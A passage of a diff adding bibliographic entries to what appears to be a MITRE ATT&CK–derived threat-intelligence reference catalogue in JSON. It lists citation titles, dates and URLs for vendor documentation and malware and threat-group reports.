Authentication for Remote Desktop Services Connections" + }, + "related": [], + "uuid": "39e28cae-a35a-4cf2-a281-c35f4ebd16ba", + "value": "TechNet RDP NLA" + }, + { + "description": "Microsoft. (2022, November 14). Configure security alerts for Azure AD roles in Privileged Identity Management. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-11-14T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/aad-security-baseline" + ], + "source": "MITRE", + "title": "Configure security alerts for Azure AD roles in Privileged Identity Management" + }, + "related": [], + "uuid": "7bde8cd2-6c10-5342-9a4b-a45e84a861b6", + "value": "Microsoft Security Alerts for Azure AD Roles" + }, + { + "description": "Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2022-02-26T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/" + ], + "source": "MITRE", + "title": "Configure Service Accounts for Pods" + }, + "related": [], + "uuid": "a74ffa28-8a2e-4bfd-bc66-969b463bebd9", + "value": "Kubernetes Service Accounts" + }, + { + "description": "Microsoft. (n.d.). Configure Timeout and Reconnection Settings for Remote Desktop Services Sessions. Retrieved December 11, 2017.", + "meta": { + "date_accessed": "2017-12-11T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx" + ], + "source": "MITRE", + "title": "Configure Timeout and Reconnection Settings for Remote Desktop Services Sessions" + }, + "related": [], + "uuid": "ccd0d241-4ff7-4a15-b2b4-06945980c6bf", + "value": "Windows RDP Sessions" + }, + { + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", + "meta": { + "date_accessed": "2015-06-24T00:00:00Z", + "date_published": "2013-07-31T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/dn408187.aspx" + ], + "source": "MITRE", + "title": "Configuring Additional LSA Protection" + }, + "related": [], + "uuid": "4adfc72b-cd32-46a6-bdf4-a4c2c6cffa73", + "value": "Microsoft Configure LSA" + }, + { + "description": "Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.", + "meta": { + "date_accessed": "2017-11-27T00:00:00Z", + "date_published": "2014-03-12T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/dn408187.aspx" + ], + "source": "MITRE", + "title": "Configuring Additional LSA Protection" + }, + "related": [], + "uuid": "da3f1d7d-188f-4500-9bc6-3299ba043b5c", + "value": "Microsoft LSA Protection Mar 2014" + }, + { + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved February 13, 2015.", + "meta": { + "date_accessed": "2015-02-13T00:00:00Z", + "date_published": "2013-07-31T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/dn408187.aspx" + ], + "source": "MITRE", + "title": "Configuring Additional LSA Protection" + }, + "related": [], + "uuid": "3ad49746-4e42-4663-a49e-ae64152b9463", + "value": "Microsoft LSA" + }, + { + "description": "Google. (n.d.). Configuring Data Access audit logs. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "refs": [ + "https://cloud.google.com/logging/docs/audit/configure-data-access" + ], + "source": "MITRE", + "title": "Configuring Data Access audit logs" + }, + "related": [], + "uuid": "bd310606-f472-4eda-a696-50a3a25f07b3", + "value": "Configuring Data Access audit logs" + }, + { + "description": "Microsoft. (n.d.). Configuring SID Filter Quarantining on External Trusts. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/cc794757.aspx" + ], + "source": "MITRE", + "title": "Configuring SID Filter Quarantining on External Trusts" + }, + "related": [], + "uuid": "134169f1-7bd3-4d04-81a8-f01e1407a4b6", + "value": "Microsoft SID Filtering Quarantining Jan 2009" + }, + { + "description": "Schauland, D. (2009, February 24). Configuring Wireless settings via Group Policy. Retrieved July 26, 2018.", + "meta": { + "date_accessed": "2018-07-26T00:00:00Z", + "date_published": "2009-02-24T00:00:00Z", + "refs": [ + "https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/" + ], + "source": "MITRE", + "title": "Configuring Wireless settings via Group Policy" + }, + "related": [], + "uuid": "b62415f8-76bd-4585-ae81-a4d04ccfc703", + "value": "TechRepublic Wireless GPO FEB 2009" + }, + { + "description": "Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant's network. Retrieved January 20, 2021.", + "meta": { + "date_accessed": "2021-01-20T00:00:00Z", + "date_published": "2019-10-30T00:00:00Z", + "refs": [ + "https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/" + ], + "source": "MITRE", + "title": "Confirmed: North Korean malware found on Indian nuclear plant's network" + }, + "related": [], + "uuid": "6e6e02da-b805-47d7-b410-343a1b5da042", + "value": "ZDNet Dtrack" + }, + { + "description": "Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021.", + "meta": { + "date_accessed": "2021-12-17T00:00:00Z", + "date_published": "2021-01-12T00:00:00Z", + "refs": [ + "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat" + ], + "source": "MITRE", + "title": "Confucius APT deploys Warzone RAT" + }, + "related": [], + "uuid": "d74f2c25-cd53-4587-b087-7ba0b8427dc4", + "value": "Uptycs Confucius APT Jan 2021" + }, + { + "description": "Lunghi, D. (2021, August 17). Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military. Retrieved December 26, 2021.", + "meta": { + "date_accessed": "2021-12-26T00:00:00Z", + "date_published": "2021-08-17T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military" + }, + "related": [], + "uuid": "5c16aae9-d253-463b-8bbc-f14402ce77e4", + "value": "TrendMicro Confucius APT Aug 2021" + }, + { + "description": "LOLBAS. (2022, April 5). Conhost.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-04-05T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Conhost/" + ], + "source": "Tidal Cyber", + "title": "Conhost.exe" + }, + "related": [], + "uuid": "5ed807c1-15d1-48aa-b497-8cd74fe5b299", + "value": "Conhost.exe - LOLBAS Project" + }, + { + "description": "AWS. (2023, June 2). Connect using EC2 Instance Connect. Retrieved June 2, 2023.", + "meta": { + "date_accessed": "2023-06-02T00:00:00Z", + "date_published": "2023-06-02T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html" + ], + "source": "MITRE", + "title": "Connect using EC2 Instance Connect" + }, + "related": [], + "uuid": "deefa5b7-5a28-524c-b500-bc5574aa9920", + "value": "EC2 Instance Connect" + }, + { + "description": "docker docs. (n.d.). Containers. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + "source": "MITRE", + "title": "Containers" + }, + "related": [], + "uuid": "3475b705-3ab8-401d-bee6-e187c43ad3c2", + "value": "Docker Docs Container" + }, + { + "description": "Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2017-09-06T00:00:00Z", + "refs": [ + "https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/" + ], + "source": "MITRE", + "title": "Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It" + }, + "related": [], + "uuid": "183a070f-6c8c-46e3-915b-6edc58bb5e91", + "value": "DigitalShadows CDN" + }, + { + "description": "Microsoft. (2019, September 5). Content trust in Azure Container Registry. Retrieved October 16, 2019.", + "meta": { + "date_accessed": "2019-10-16T00:00:00Z", + "date_published": "2019-09-05T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/container-registry/container-registry-content-trust" + ], + "source": "MITRE", + "title": "Content trust in Azure Container Registry" + }, + "related": [], + "uuid": "fcd211a1-ac81-4ebc-b395-c8fa2a4d614a", + "value": "Content trust in Azure Container Registry" + }, + { + "description": "Docker. (2019, October 10). Content trust in Docker. Retrieved October 16, 2019.", + "meta": { + "date_accessed": "2019-10-16T00:00:00Z", + "date_published": "2019-10-10T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/security/trust/content_trust/" + ], + "source": "MITRE", + "title": "Content trust in Docker" + }, + "related": [], + "uuid": "57691166-5a22-44a0-8724-6b3b19658c3b", + "value": "Content trust in Docker" + }, + { + "description": "DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.", + "meta": { + "date_accessed": "2022-09-29T00:00:00Z", + "date_published": "2021-11-29T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" + ], + "source": "MITRE", + "title": "CONTInuing the Bazar Ransomware Story" + }, + "related": [], + "uuid": "a6f1a15d-448b-41d4-81f0-ee445cba83bd", + "value": "DFIR Conti Bazar Nov 2021" + }, + { + "description": "Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021.", + "meta": { + "date_accessed": "2021-02-17T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware" + ], + "source": "MITRE", + "title": "Conti Ransomware" + }, + "related": [], + "uuid": "3c0e82a2-41ab-4e63-ac10-bd691c786234", + "value": "Cybereason Conti Jan 2021" + }, + { + "description": "Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government & Large Organizations. Retrieved April 13, 2021.", + "meta": { + "date_accessed": "2021-04-13T00:00:00Z", + "date_published": "2021-01-21T00:00:00Z", + "refs": [ + "https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/" + ], + "source": "MITRE", + "title": "Conti Ransomware Resurfaces, Targeting Government & Large Organizations" + }, + "related": [], + "uuid": "5ef0ad9d-f34d-4771-a595-7ee4994f6c91", + "value": "Cybleinc Conti January 2020" + }, + { + "description": "LOLBAS. (2018, May 25). Control.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Control/" + ], + "source": "Tidal Cyber", + "title": "Control.exe" + }, + "related": [], + "uuid": "d0c821b9-7d37-4158-89fa-0dabe6e06800", + "value": "Control.exe - LOLBAS Project" + }, + { + "description": "Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.", + "meta": { + "date_accessed": "2018-03-12T00:00:00Z", + "date_published": "2018-01-11T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Control-flow_integrity" + ], + "source": "MITRE", + "title": "Control-flow integrity" + }, + "related": [], + "uuid": "a9b2f525-d812-4dea-b4a6-c0d057d5f071", + "value": "Wikipedia Control Flow Integrity" + }, + { + "description": "The Kubernetes Authors. (n.d.). Controlling Access to The Kubernetes API. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/concepts/security/controlling-access/" + ], + "source": "MITRE", + "title": "Controlling Access to The Kubernetes API" + }, + "related": [], + "uuid": "fd4577b6-0085-44c0-b4c3-4d66dcb39fe7", + "value": "Kubernetes API Control Access" + }, + { + "description": "Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.", + "meta": { + "date_accessed": "2018-01-18T00:00:00Z", + "date_published": "2013-12-17T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/" + ], + "source": "MITRE", + "title": "Control Panel Files Used As Malicious Attachments" + }, + "related": [], + "uuid": "fd38f1fd-37e9-4173-b319-3f92c2743055", + "value": "TrendMicro CPL Malware Dec 2013" + }, + { + "description": "Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.", + "meta": { + "date_accessed": "2017-11-17T00:00:00Z", + "date_published": "2016-08-28T00:00:00Z", + "refs": [ + "https://github.com/Kevin-Robertson/Conveigh" + ], + "source": "MITRE", + "title": "Conveigh" + }, + "related": [], + "uuid": "4deb8c8e-2da1-4634-bf04-5ccf620a2143", + "value": "GitHub Conveigh" + }, + { + "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", + "meta": { + "date_accessed": "2015-12-11T00:00:00Z", + "date_published": "2013-07-30T00:00:00Z", + "refs": [ + "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" + ], + "source": "MITRE", + "title": "Copernicus: Question Your Assumptions about BIOS Security" + }, + "related": [], + "uuid": "55d139fe-f5e5-4b5e-9123-8133b459ea72", + "value": "MITRE Copernicus" + }, + { + "description": "Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021.", + "meta": { + "date_accessed": "2021-10-06T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone" + ], + "source": "MITRE", + "title": "COPPER FIELDSTONE" + }, + "related": [], + "uuid": "d7f5f154-3638-47c1-8e1e-a30a6504a735", + "value": "Secureworks COPPER FIELDSTONE Profile" + }, + { + "description": "Microsoft. (n.d.). Copy. Retrieved April 26, 2016.", + "meta": { + "date_accessed": "2016-04-26T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490886.aspx" + ], + "source": "MITRE", + "title": "Copy" + }, + "related": [], + "uuid": "4e0d4b94-6b4c-4104-86e6-499b6aa7ba78", + "value": "TechNet Copy" + }, + { + "description": "Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2022-08-16T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689" + ], + "source": "MITRE", + "title": "copy - Cisco IOS Configuration Fundamentals Command Reference" + }, + "related": [], + "uuid": "88138372-550f-5da5-be5e-b5ba0fe32f64", + "value": "copy_cmd_cisco" + }, + { + "description": "Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.", + "meta": { + "date_accessed": "2017-09-11T00:00:00Z", + "date_published": "2015-11-23T00:00:00Z", + "refs": [ + "https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf" + ], + "source": "MITRE", + "title": "CopyKittens Attack Group" + }, + "related": [], + "uuid": "04e3ce40-5487-4931-98db-f55da83f412e", + "value": "CopyKittens Nov 2015" + }, + { + "description": "LOLBAS. (2020, October 9). coregen.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-10-09T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/" + ], + "source": "Tidal Cyber", + "title": "coregen.exe" + }, + "related": [], + "uuid": "f24d4cf5-9ca9-46bd-bd43-86b37e2a638a", + "value": "coregen.exe - LOLBAS Project" + }, + { + "description": "Apple. (n.d.). Core Services. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "refs": [ + "https://developer.apple.com/documentation/coreservices" + ], + "source": "MITRE", + "title": "Core Services" + }, + "related": [], + "uuid": "0ef05e47-1305-4715-a677-67f1b55b24a3", + "value": "Apple Core Services" + }, + { + "description": "MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.", + "meta": { + "date_accessed": "2019-08-16T00:00:00Z", + "date_published": "2019-08-05T00:00:00Z", + "refs": [ + "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/" + ], + "source": "MITRE", + "title": "Corporate IoT – a path to intrusion" + }, + "related": [], + "uuid": "7efd3c8d-5e69-4b6f-8edb-9186abdf0e1a", + "value": "Microsoft STRONTIUM Aug 2019" + }, + { + "description": "Palo Alto Networks. (2021, November 24). Cortex XDR Analytics Alert Reference: Uncommon ARP cache listing via arp.exe. Retrieved December 7, 2021.", + "meta": { + "date_accessed": "2021-12-07T00:00:00Z", + "date_published": "2021-11-24T00:00:00Z", + "refs": [ + "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/uncommon-arp-cache-listing-via-arp-exe.html" + ], + "source": "MITRE", + "title": "Cortex XDR Analytics Alert Reference: Uncommon ARP cache listing via arp.exe" + }, + "related": [], + "uuid": "96ce4324-57d2-422b-8403-f5d4f3ce410c", + "value": "Palo Alto ARP" + }, + { + "description": "F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.", + "meta": { + "date_accessed": "2014-07-03T00:00:00Z", + "date_published": "2014-07-01T00:00:00Z", + "refs": [ + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf" + ], + "source": "MITRE", + "title": "COSMICDUKE Cosmu with a twist of MiniDuke" + }, + "related": [], + "uuid": "d0d5ecbe-1051-4ceb-b558-b8b451178358", + "value": "F-Secure Cosmicduke" + }, + { + "description": "Costin Raiu. (2020, October 2). Costin Raiu Twitter IAmTheKing SlothfulMedia. Retrieved November 16, 2020.", + "meta": { + "date_accessed": "2020-11-16T00:00:00Z", + "date_published": "2020-10-02T00:00:00Z", + "refs": [ + "https://twitter.com/craiu/status/1311920398259367942" + ], + "source": "MITRE", + "title": "Costin Raiu Twitter IAmTheKing SlothfulMedia" + }, + "related": [], + "uuid": "2be88843-ed3a-460e-87c1-85aa50e827c8", + "value": "Costin Raiu IAmTheKing October 2020" + }, + { + "description": "Bash, A. (2021, October 14). Countering threats from Iran. Retrieved January 4, 2023.", + "meta": { + "date_accessed": "2023-01-04T00:00:00Z", + "date_published": "2021-10-14T00:00:00Z", + "refs": [ + "https://blog.google/threat-analysis-group/countering-threats-iran/" + ], + "source": "MITRE", + "title": "Countering threats from Iran" + }, + "related": [], + "uuid": "6d568141-eb54-5001-b880-ae8ac1156746", + "value": "Google Iran Threats October 2021" + }, + { + "description": "Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.", + "meta": { + "date_accessed": "2017-03-08T00:00:00Z", + "date_published": "2017-03-02T00:00:00Z", + "refs": [ + "http://blog.talosintelligence.com/2017/03/dnsmessenger.html" + ], + "source": "MITRE", + "title": "Covert Channels and Poor Decisions: The Tale of DNSMessenger" + }, + "related": [], + "uuid": "49f22ba2-5aca-4204-858e-c2499a7050ae", + "value": "Cisco DNSMessenger March 2017" + }, + { + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.", + "meta": { + "date_accessed": "2020-07-14T00:00:00Z", + "date_published": "2020-06-18T00:00:00Z", + "refs": [ + "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware" + ], + "source": "MITRE", + "title": "COVID-19 and FMLA Campaigns used to install new IcedID banking malware" + }, + "related": [], + "uuid": "426886d0-cdf2-4af7-a0e4-366c1b0a1942", + "value": "Juniper IcedID June 2020" + }, + { + "description": "PT ESC Threat Intelligence. (2020, June 4). COVID-19 and New Year greetings: an investigation into the tools and methods used by the Higaisa group. Retrieved March 2, 2021.", + "meta": { + "date_accessed": "2021-03-02T00:00:00Z", + "date_published": "2020-06-04T00:00:00Z", + "refs": [ + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/" + ], + "source": "MITRE, Tidal Cyber", + "title": "COVID-19 and New Year greetings: an investigation into the tools and methods used by the Higaisa group" + }, + "related": [], + "uuid": "cf8f3d9c-0d21-4587-a707-46848a15bd46", + "value": "PTSecurity Higaisa 2020" + }, + { + "description": "F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.", + "meta": { + "date_accessed": "2015-12-10T00:00:00Z", + "date_published": "2015-04-22T00:00:00Z", + "refs": [ + "https://www.f-secure.com/documents/996508/1030745/CozyDuke" + ], + "source": "MITRE", + "title": "CozyDuke: Malware Analysis" + }, + "related": [], + "uuid": "08e1d233-0580-484e-b737-af091e2aa9ea", + "value": "F-Secure CozyDuke" + }, + { + "description": "Mercês, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.", + "meta": { + "date_accessed": "2018-01-18T00:00:00Z", + "date_published": "2014-01-27T00:00:00Z", + "refs": [ + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + ], + "source": "MITRE", + "title": "CPL Malware - Malicious Control Panel Items" + }, + "related": [], + "uuid": "9549f9b6-b771-4500-bd82-426c7abdfd8f", + "value": "TrendMicro CPL Malware Jan 2014" + }, + { + "description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.", + "meta": { + "date_accessed": "2017-11-01T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + ], + "source": "MITRE", + "title": "CPL Malware Malicious Control Panel Items" + }, + "related": [], + "uuid": "d90a33aa-8f20-49cb-aa27-771249cb65eb", + "value": "Trend Micro CPL" + }, + { + "description": "Thomas, W. (2022, October 5). Cracked Brute Ratel C4 framework proliferates across the cybercriminal underground. Retrieved February 6, 2023.", + "meta": { + "date_accessed": "2023-02-06T00:00:00Z", + "date_published": "2022-10-05T00:00:00Z", + "refs": [ + "https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/" + ], + "source": "MITRE", + "title": "Cracked Brute Ratel C4 framework proliferates across the cybercriminal underground" + }, + "related": [], + "uuid": "9544e762-6f72-59e7-8384-5bbef13bfe96", + "value": "SANS Brute Ratel October 2022" + }, + { + "description": "Jeff Warren. (2019, June 27). Cracking Active Directory Passwords with AS-REP Roasting. Retrieved August 24, 2020.", + "meta": { + "date_accessed": "2020-08-24T00:00:00Z", + "date_published": "2019-06-27T00:00:00Z", + "refs": [ + "https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/" + ], + "source": "MITRE", + "title": "Cracking Active Directory Passwords with AS-REP Roasting" + }, + "related": [], + "uuid": "3af06034-8384-4de8-9356-e9aaa35b95a2", + "value": "Stealthbits Cracking AS-REP Roasting Jun 2019" + }, + { + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "meta": { + "date_accessed": "2018-03-22T00:00:00Z", + "date_published": "2015-12-31T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=2293" + ], + "source": "MITRE", + "title": "Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain" + }, + "related": [], + "uuid": "1b018fc3-515a-4ec4-978f-6d5649ceb0c5", + "value": "AdSecurity Cracking Kerberos Dec 2015" + }, + { + "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.", + "meta": { + "date_accessed": "2020-12-18T00:00:00Z", + "date_published": "2017-06-13T00:00:00Z", + "refs": [ + "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + ], + "source": "MITRE", + "title": "CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations" + }, + "related": [], + "uuid": "c8f624e3-2ba2-4564-bd1c-f06b9a6a8bce", + "value": "Dragos Crashoverride 2017" + }, + { + "description": "Unit 42. (n.d.). Crawling Taurus. Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://unit42.paloaltonetworks.com/atoms/crawling-taurus/" + ], + "source": "Tidal Cyber", + "title": "Crawling Taurus" + }, + "related": [], + "uuid": "75098b2c-4928-4e3f-9bcc-b4f6b8de96f8", + "value": "Unit 42 ATOM Crawling Taurus" + }, + { + "description": "Microsoft. (2021, August 23). Create a managed image of a generalized VM in Azure. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "date_published": "2021-08-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource" + ], + "source": "MITRE", + "title": "Create a managed image of a generalized VM in Azure" + }, + "related": [], + "uuid": "5317c625-d0be-45eb-9321-0cc9aa295cc9", + "value": "Microsoft Image" + }, + { + "description": "Microsoft. (2021, September 16). Create a snapshot of a virtual hard disk. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "date_published": "2021-09-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk" + ], + "source": "MITRE", + "title": "Create a snapshot of a virtual hard disk" + }, + "related": [], + "uuid": "693549da-d9b9-4b67-a1bb-c8ea4a099842", + "value": "Microsoft Snapshot" + }, + { + "description": "Brower, N., Lich, B. (2017, April 19). Create a token object. Retrieved December 19, 2017.", + "meta": { + "date_accessed": "2017-12-19T00:00:00Z", + "date_published": "2017-04-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/device-security/security-policy-settings/create-a-token-object" + ], + "source": "MITRE", + "title": "Create a token object" + }, + "related": [], + "uuid": "d36d4f06-007e-4ff0-8660-4c65721d0b92", + "value": "Microsoft Create Token" + }, + { + "description": "Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020.", + "meta": { + "date_accessed": "2020-01-29T00:00:00Z", + "refs": [ + "https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554" + ], + "source": "MITRE", + "title": "Create Cloud Identity user accounts" + }, + "related": [], + "uuid": "e91748b2-1432-4203-a1fe-100aa70458d2", + "value": "GCP Create Cloud Identity Users" + }, + { + "description": "LOLBAS. (2022, January 20). Createdump.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-01-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/" + ], + "source": "Tidal Cyber", + "title": "Createdump.exe" + }, + "related": [], + "uuid": "f3ccacc1-3b42-4042-9a5c-f5b483a5e801", + "value": "Createdump.exe - LOLBAS Project" + }, + { + "description": "Google Cloud. (n.d.). Create IAM policies. Retrieved July 14, 2023.", + "meta": { + "date_accessed": "2023-07-14T00:00:00Z", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/iam" + ], + "source": "MITRE", + "title": "Create IAM policies" + }, + "related": [], + "uuid": "e8ee3ac6-ae7c-5fd3-a339-b579a419dd96", + "value": "Google Cloud Kubernetes IAM" + }, + { + "description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "refs": [ + "http://msdn.microsoft.com/en-us/library/ms682425" + ], + "source": "MITRE", + "title": "CreateProcess function" + }, + "related": [], + "uuid": "aa336e3a-464d-48ce-bebb-760b73764610", + "value": "Microsoft CreateProcess" + }, + { + "description": "Microsoft . (n.d.). Create subscription. Retrieved August 4, 2023.", + "meta": { + "date_accessed": "2023-08-04T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/graph/api/subscription-post-subscriptions" + ], + "source": "MITRE", + "title": "Create subscription" + }, + "related": [], + "uuid": "1331b524-7d6f-59d9-a2bd-78ff7b3e371f", + "value": "Microsoft CLI Create Subscription" + }, + { + "description": "Microsoft. (2021, October 28). Create symbolic links. Retrieved April 27, 2022.", + "meta": { + "date_accessed": "2022-04-27T00:00:00Z", + "date_published": "2021-10-28T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/create-symbolic-links" + ], + "source": "MITRE", + "title": "Create symbolic links" + }, + "related": [], + "uuid": "06bfdf8f-8671-47f7-9d0c-baf234c7ae96", + "value": "create_sym_links" + }, + { + "description": "Google. (2020, April 23). Creating and Starting a VM instance. Retrieved May 1, 2020.", + "meta": { + "date_accessed": "2020-05-01T00:00:00Z", + "date_published": "2020-04-23T00:00:00Z", + "refs": [ + "https://cloud.google.com/compute/docs/instances/create-start-instance#api_2" + ], + "source": "MITRE", + "title": "Creating and Starting a VM instance" + }, + "related": [], + "uuid": "c1b87a56-115a-46d7-9117-80442091ac3c", + "value": "GCP - Creating and Starting a VM" + }, + { + "description": "AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020.", + "meta": { + "date_accessed": "2020-01-29T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html" + ], + "source": "MITRE", + "title": "Creating an IAM User in Your AWS Account" + }, + "related": [], + "uuid": 